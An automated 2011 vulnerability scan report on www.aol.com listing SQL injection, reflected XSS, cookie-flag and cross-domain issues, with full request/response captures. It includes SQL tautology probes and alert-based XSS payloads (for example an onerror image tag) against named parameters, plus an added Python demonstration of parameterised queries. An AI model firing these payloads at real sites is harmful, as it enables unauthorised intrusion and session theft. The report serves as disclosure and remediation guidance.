XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, www.aol.com

Report generated by XSS.CX at Thu Aug 18 17:29:52 GMT-06:00 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

1. SQL injection

2. Cross-site scripting (reflected)

2.1. http://www.aol.com/ [dlact parameter]

2.2. http://www.aol.com/video//%22ns=%22alert(0x000254)//%22ns=%22alert(0x000254) [REST URL parameter 2]

2.3. http://www.aol.com/video//%22ns=%22alert(0x000254)//%22ns=%22alert(0x000254) [REST URL parameter 2]

2.4. http://www.aol.com/video/urlesque-mans-about-to-do-the-impossible/1116699228001/ [REST URL parameter 3]

2.5. http://www.aol.com/video/urlesque-mans-about-to-do-the-impossible/1116699228001/ [REST URL parameter 3]

2.6. http://www.aol.com/ [dlact cookie]

2.7. http://www.aol.com/ [rrpmo1 cookie]

2.8. http://www.aol.com/video/urlesque-mans-about-to-do-the-impossible/1116699228001/ [rrpmo1 cookie]

3. Silverlight cross-domain policy

4. Flash cross-domain policy

5. Cookie without HttpOnly flag set

5.1. http://www.aol.com/

5.2. http://www.aol.com/ajax.jsp

5.3. http://www.aol.com/video//%22ns=%22alert(0x000254)//%22ns=%22alert(0x000254)

5.4. http://www.aol.com/video/urlesque-mans-about-to-do-the-impossible/1116699228001/

5.5. http://www.aol.com/video/urlesque-mans-about-to-do-the-impossible/1116699228001/ajax.jsp

6. Cross-domain Referer leakage

6.1. http://www.aol.com/

6.2. http://www.aol.com/

6.3. http://www.aol.com/ajax.jsp

6.4. http://www.aol.com/ajax.jsp

6.5. http://www.aol.com/ajax.jsp

6.6. http://www.aol.com/ajax.jsp

6.7. http://www.aol.com/ajax.jsp

6.8. http://www.aol.com/ajax.jsp

6.9. http://www.aol.com/ajax.jsp

6.10. http://www.aol.com/ajax.jsp

6.11. http://www.aol.com/ajax.jsp

6.12. http://www.aol.com/ajax.jsp

6.13. http://www.aol.com/ajax.jsp

6.14. http://www.aol.com/ajax.jsp

6.15. http://www.aol.com/ajax.jsp

6.16. http://www.aol.com/ajax.jsp

6.17. http://www.aol.com/ajax.jsp

6.18. http://www.aol.com/ajax.jsp

6.19. http://www.aol.com/ajax.jsp

6.20. http://www.aol.com/ajax.jsp

6.21. http://www.aol.com/ajax.jsp

6.22. http://www.aol.com/ajax.jsp

6.23. http://www.aol.com/ajax.jsp

6.24. http://www.aol.com/ajax.jsp

6.25. http://www.aol.com/ajax.jsp

6.26. http://www.aol.com/ajax.jsp

6.27. http://www.aol.com/ajax.jsp

6.28. http://www.aol.com/ajax.jsp

6.29. http://www.aol.com/ajax.jsp

7. Cross-domain script include

7.1. http://www.aol.com/

7.2. http://www.aol.com/video//%22ns=%22alert(0x000254)//%22ns=%22alert(0x000254)

7.3. http://www.aol.com/video/urlesque-mans-about-to-do-the-impossible/1116699228001/

8. HTML does not specify charset

8.1. http://www.aol.com/ads/load_v7.html

8.2. http://www.aol.com/video/urlesque-mans-about-to-do-the-impossible/1116699228001/ads/load_v7.html

9. Content type incorrectly stated

9.1. http://www.aol.com/ajax.jsp

9.2. http://www.aol.com/video/urlesque-mans-about-to-do-the-impossible/1116699228001/ajax.jsp



1. SQL injection

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The tst cookie appears to be vulnerable to SQL injection attacks. The payloads 16870303'%20or%201%3d1--%20 and 16870303'%20or%201%3d2--%20 were each submitted in the tst cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. In the two responses captured below, both bodies are 2585 bytes, the visible portions of the bodies are identical, and in both cases the server re-issues the tst cookie with the injected suffix stripped; the only visible differences are the Date header and the JSESSIONID cookie set in the first response. Whatever difference the scanner keyed on is not in the excerpt, so this finding should be treated as unconfirmed until the full responses are diffed.

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
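The following is an added illustration, not code from the report or from the application under test: it replays the scanner's two tst-cookie probes against a concatenated query and against a parameterised one, using an in-memory SQLite table. The table, its contents and the idea that the cookie value is looked up by visitor id are assumptions made for the example (the report never shows the back-end schema); the two probe strings are the ones quoted in the issue detail above.

```python
import sqlite3
from urllib.parse import unquote

# The scanner's two probes, exactly as they appear in the tst cookie above.
TRUE_PROBE = unquote("16870303'%20or%201%3d1--%20")   # 16870303' or 1=1--
FALSE_PROBE = unquote("16870303'%20or%201%3d2--%20")  # 16870303' or 1=2--

# Constructed sample data: the schema and rows are assumptions for this
# illustration, not anything shown in the report.
SAMPLE_ROWS = [("16870303", "dl1"), ("16870304", "dl2"), ("16870305", "dl3")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE lead_state (visitor_id TEXT, slot TEXT)")
    conn.executemany("INSERT INTO lead_state VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, visitor_id):
    # The cookie value is spliced into the SQL text, so a quote inside it
    # ends the literal and everything after it is parsed as SQL.
    sql = "SELECT slot FROM lead_state WHERE visitor_id = '" + visitor_id + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterised(conn, visitor_id):
    # Placeholder binding: the driver hands the value to SQLite separately
    # from the statement text, so it is only ever compared as data.
    sql = "SELECT slot FROM lead_state WHERE visitor_id = ?"
    return [row[0] for row in conn.execute(sql, (visitor_id,))]


def differential_probe(lookup, conn):
    """Replay the true/false probe pair against one lookup function.

    Returns both result sets and a verdict. If a tautology and a
    contradiction produce different results (or either raises a database
    error), the input is reaching the query grammar.
    """
    results = {"errors": []}
    for name, probe in (("true", TRUE_PROBE), ("false", FALSE_PROBE)):
        try:
            results[name] = sorted(lookup(conn, probe))
        except sqlite3.Error as exc:
            results[name] = []
            results["errors"].append(name + ": " + str(exc))
    results["injectable"] = bool(results["errors"]) or results["true"] != results["false"]
    return results


if __name__ == "__main__":
    db = make_db()
    print("concatenated: ", differential_probe(lookup_vulnerable, db))
    print("parameterised:", differential_probe(lookup_parameterised, db))
```

With concatenation the tautology returns every row and the contradiction returns one, which is the response difference the scanner looks for; with a bound placeholder both probes return nothing, because the whole string is compared as a visitor id and matches no row. The same replay against the real ajax.jsp is the manual check the note above asks for.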

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

Request 1

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=2&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
Referer: http://www.aol.com/
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a16870303'%20or%201%3d1--%20; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_getnr%3D1313705645120-New%7C1376777645120%3B%20s_nrgvo%3DNew%7C1376777645122%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; CUNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; rrpmo1=rr1~1~1313705624439~0; stips5=1; dlact=dl2

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:18:25 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-106-89.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2585
Set-Cookie: JSESSIONID=5A5555ED7A95E54FD93F69FEEB2177FA; Path=/aol
Set-Cookie: tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; Expires=Sat, 17-Aug-2013 22:18:25 GMT; Path=/
Content-Length: 2585

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl2 plid-87611 display-lightbox">
<span class="dn" id="dl-vid"></span>
<span class="dn" id="dl-vslot">dynamiclead2</span>
<span class="dn" id="dl-playlist"></span>
<a id="dlimg" name="om_dl2_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl2|sec1_lnk1|87611" href="http://www.tmz.com/2011/08/18/mary-ingalls-melissa-sue-anderson-little-house-on-the-prairie-memba-her-gorwn-up/"><img height="217" alt="Mary Ingalls on 'Prairie'" width="386" src="http://o.aolcdn.com/hss/storage/adam/ccb1b5a053b320c237c4b35debfacdf4/tmz2-386az08182011.jpg"/></a><span class='credit'>TMZ.com</span><h2><a name="om_dl2_hdln" href="http://www.tmz.com/2011/08/18/mary-ingalls-melissa-sue-anderson-little-house-on-the-prairie-memba-her-gorwn-up/" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl2|sec1_lnk2|87611">Remember Mary Ingalls on 'Prairie'?


</a></h2>
<p>At 11, Melissa Sue Anderson beat out hundreds of kids for the role she played for seven straight seasons.

</p>

<p class="lede-link"><a name="om_dl2_cpy" href="http://www.tmz.com/2011/08/18/mary-ingalls-melissa-sue-anderson-little-house-on-the-prairie-memba-her-gorwn-up/" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl2|sec1_lnk3|87611">She still looks angelic today at 48
</a></p>
<h3>Hollywood Headlines
</h3>
<ul id="om_dl2_slde">
<li ><a name="om_dl2_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl2|sec3_lnk1|87611" h
...[SNIP]...

Request 2

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=2&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
Referer: http://www.aol.com/
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a16870303'%20or%201%3d2--%20; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_getnr%3D1313705645120-New%7C1376777645120%3B%20s_nrgvo%3DNew%7C1376777645122%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; CUNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; rrpmo1=rr1~1~1313705624439~0; stips5=1; dlact=dl2

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:18:26 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-106-89.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2585
Set-Cookie: tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; Expires=Sat, 17-Aug-2013 22:18:27 GMT; Path=/
Content-Length: 2585

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl2 plid-87611 display-lightbox">
<span class="dn" id="dl-vid"></span>
<span class="dn" id="dl-vslot">dynamiclead2</span>
<span class="dn" id="dl-playlist"></span>
<a id="dlimg" name="om_dl2_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl2|sec1_lnk1|87611" href="http://www.tmz.com/2011/08/18/mary-ingalls-melissa-sue-anderson-little-house-on-the-prairie-memba-her-gorwn-up/"><img height="217" alt="Mary Ingalls on 'Prairie'" width="386" src="http://o.aolcdn.com/hss/storage/adam/ccb1b5a053b320c237c4b35debfacdf4/tmz2-386az08182011.jpg"/></a><span class='credit'>TMZ.com</span><h2><a name="om_dl2_hdln" href="http://www.tmz.com/2011/08/18/mary-ingalls-melissa-sue-anderson-little-house-on-the-prairie-memba-her-gorwn-up/" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl2|sec1_lnk2|87611">Remember Mary Ingalls on 'Prairie'?


</a></h2>
<p>At 11, Melissa Sue Anderson beat out hundreds of kids for the role she played for seven straight seasons.

</p>

<p class="lede-link"><a name="om_dl2_cpy" href="http://www.tmz.com/2011/08/18/mary-ingalls-melissa-sue-anderson-little-house-on-the-prairie-memba-her-gorwn-up/" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl2|sec1_lnk3|87611">She still looks angelic today at 48
</a></p>
<h3>Hollywood Headlines
</h3>
<ul id="om_dl2_slde">
<li ><a name="om_dl2_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl2|sec3_lnk1|87611" href="http://www.huffingtonpost.com/2011/08/18/chaz-bono-becoming-cha
...[SNIP]...

2. Cross-site scripting (reflected)
There are 8 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://www.aol.com/ [dlact parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aol.com
Path:   /

Issue detail

The value of the dlact request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ee19"%3balert(1)//75b3c833dad was submitted in the dlact parameter. This input was echoed as 7ee19";alert(1)//75b3c833dad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?icid=aolcomlogorefresh5&dlact=dl17ee19"%3balert(1)//75b3c833dad HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2722E86A051D367A-6000013620041512[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1313705608337-New%7C1376777608337%3B%20s_nrgvo%3DNew%7C1376777608338%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1313705590192~0; stips5=1; dlact=dl5; UNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; CUNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:19:39 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-173-58.asset.aol.com
Content-Type: text/html;;charset=utf-8
Set-Cookie: JSESSIONID=2641CC6722AD709C0622A7AB9BAA86AD; Path=/aol
Content-Length: 81550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<script type="text/javascript">
var dlImps = new Array();dlImps["dl1"]=true;
var dlact = "dl17ee19";alert(1)//75b3c833dad";
var dlduration = 10000;
var dloverrided = false;
var dlcurr = 1;
var dltotal = 25;
var paramslot = "dynamiclead";
var dloffset = 0;
var ftmslo
...[SNIP]...

2.2. http://www.aol.com/video//%22ns=%22alert(0x000254)//%22ns=%22alert(0x000254) [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.aol.com
Path:   /video//%22ns=%22alert(0x000254)//%22ns=%22alert(0x000254)

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b07fd(a)c00e971c226 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video//%22nsb07fd(a)c00e971c226=%22alert(0x000254)//%22ns=%22alert(0x000254) HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Connection: keep-alive
Proxy-Connection: keep-alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 18 Aug 2011 23:26:32 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-107-96.asset.aol.com
Content-Type: text/html;;charset=utf-8
Set-Cookie: JSESSIONID=0429E687AA23CD2469AB159372279C47; Path=/aol
Connection: close
Content-Length: 16698

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
}

p23 = s_265.prop23;
if (typeof(p23) == 'undefined') {
p23 = "";
}
if (p23.length > 0){
p23 = p23 + ", vd_"nsb07fd(a)c00e971c226="alert(0x000254)";
}else{
p23 = p23 + "vd_"nsb07fd(a)c00e971c226="alert(0x000254)";
}
s_265.prop23 = p23;

var s_265_user_authen
...[SNIP]...

2.3. http://www.aol.com/video//%22ns=%22alert(0x000254)//%22ns=%22alert(0x000254) [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.aol.com
Path:   /video//%22ns=%22alert(0x000254)//%22ns=%22alert(0x000254)

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cc68e"%3bf01dcb363a6 was submitted in the REST URL parameter 2. This input was echoed as cc68e";f01dcb363a6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video//cc68e"%3bf01dcb363a6=%22alert(0x000254)//%22ns=%22alert(0x000254) HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Connection: keep-alive
Proxy-Connection: keep-alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 18 Aug 2011 23:26:31 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-174-50.asset.aol.com
Content-Type: text/html;;charset=utf-8
Set-Cookie: JSESSIONID=31E6750C85E83345318B1169C690E9BE; Path=/aol
Keep-Alive: timeout=5, max=22
Connection: Keep-Alive
Content-Length: 16685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
}

p23 = s_265.prop23;
if (typeof(p23) == 'undefined') {
p23 = "";
}
if (p23.length > 0){
p23 = p23 + ", vd_cc68e";f01dcb363a6="alert(0x000254)";
}else{
p23 = p23 + "vd_cc68e";f01dcb363a6="alert(0x000254)";
}
s_265.prop23 = p23;

var s_265_user_authentica
...[SNIP]...

2.4. http://www.aol.com/video/urlesque-mans-about-to-do-the-impossible/1116699228001/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.aol.com
Path:   /video/urlesque-mans-about-to-do-the-impossible/1116699228001/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27c59"%3b25d661220d4 was submitted in the REST URL parameter 3. This input was echoed as 27c59";25d661220d4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/urlesque-mans-about-to-do-the-impossible/111669922800127c59"%3b25d661220d4/ HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2722E86A051D367A-6000013620041512[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1313705608337-New%7C1376777608337%3B%20s_nrgvo%3DNew%7C1376777608338%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1313705590192~0; stips5=1; dlact=dl5; UNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; CUNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:17:04 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-174-50.asset.aol.com
Content-Type: text/html;;charset=utf-8
Set-Cookie: JSESSIONID=70026B65B3B457B95CCC8D06570E1399; Path=/aol
Content-Length: 40773

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...

p23 = s_265.prop23;
if (typeof(p23) == 'undefined') {
p23 = "";
}
if (p23.length > 0){
p23 = p23 + ", vd_111669922800127c59";25d661220d4";
}else{
p23 = p23 + "vd_111669922800127c59";25d661220d4";
}
s_265.prop23 = p23;

var s_265_user_authenticated=false;
s_
...[SNIP]...

2.5. http://www.aol.com/video/urlesque-mans-about-to-do-the-impossible/1116699228001/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aol.com
Path:   /video/urlesque-mans-about-to-do-the-impossible/1116699228001/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec3dd"><img%20src%3da%20onerror%3dalert(1)>c5f8d88b13f was submitted in the REST URL parameter 3. This input was echoed as ec3dd"><img src=a onerror=alert(1)>c5f8d88b13f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /video/urlesque-mans-about-to-do-the-impossible/1116699228001ec3dd"><img%20src%3da%20onerror%3dalert(1)>c5f8d88b13f/ HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2722E86A051D367A-6000013620041512[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1313705608337-New%7C1376777608337%3B%20s_nrgvo%3DNew%7C1376777608338%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1313705590192~0; stips5=1; dlact=dl5; UNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; CUNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:17:03 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-106-100.asset.aol.com
Content-Type: text/html;;charset=utf-8
Set-Cookie: JSESSIONID=4D1A143DF59B0EF72056711580694C5F; Path=/aol
Content-Length: 40854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<div class="videoPerm" id="1116699228001ec3dd"><img src=a onerror=alert(1)>c5f8d88b13f-mod">
...[SNIP]...
